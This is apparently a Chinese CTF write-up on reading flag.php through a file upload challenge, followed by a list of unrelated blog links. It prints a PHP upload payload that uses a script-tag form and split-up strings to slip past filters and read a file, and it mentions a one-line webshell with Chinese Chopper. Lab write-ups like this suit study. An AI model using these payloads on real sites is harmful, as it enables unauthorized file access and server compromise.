提示很明显,flag在flag.php中,所以,任务就是获取flag.php的内容。

方法一:一句话+菜刀(不再叙述)

方法二:上传脚本,使脚本拥有一定权限,再输出flag

先造一个php脚本

<script language="PHP">

   echo((file_get_contents('flag.'.'p'.'h'.'p')));

</script>

访问结果为空白,源码也没有什么东西。

原因是php脚本上传在了一个没有执行权限的文件夹下或是没找到flag.php,于是向上级目录探索:

<script language="PHP">

   echo((file_get_contents('../flag.'.'p'.'h'.'p')));

</script>

返回空白,查看源码拿到flag。

最新文章

  1. MVC5+EF6+MYSQl,使用codeFirst的数据迁移
  2. Windows bat脚本学习(1)
  3. ros科大讯飞语音识别
  4. [UCSD白板题] Take as Much Gold as Possible
  5. HTML静态网页 标签、表格
  6. 【POJ】【2096】Collecting Bugs
  7. MySQL(9):数据表的约束(列的属性)
  8. 大小写转换,split分割
  9. Android Recovery的汉化 显示中文
  10. php基本框架
  11. Android tools:context=&quot;.MainActivity&quot;的作用
  12. jquery插件简单的声明方法
  13. IOS开发-UI学习-UISlider(滑动条)的使用
  14. EOJ 3242 重复数
  15. 由linux命令谈学习操作系统的重要性
  16. ASP.NET Core下发布网站
  17. eclipse open call hierarchy无效
  18. python笔记—循环控制
  19. Linux 学习目录
  20. 火热的线上APP的源码分享,开箱即用

热门文章

  1. BUU re1
  2. 吴裕雄--天生自然JAVA面向对象高级编程学习笔记:继承的应用
  3. 白手起家Django项目发布下篇_Django项目nginx部署
  4. 题解 nflsoj550 【六校联合训练 省选 #9】序列
  5. 2-10 就业课(2.0)-oozie:2、介绍和安装1
  6. 将证书添加到受信任的根证书存储失败,出现以下错误:访问控制列表(ACL)结构无效
  7. 采用FLAG_ACTIVITY_CLEAR_TOP退出整个程序(多activity)
  8. PHP时间格式
  9. win2008R2 局域网共享
  10. java.neo的ByteBuffer与Netty 的ByteBuf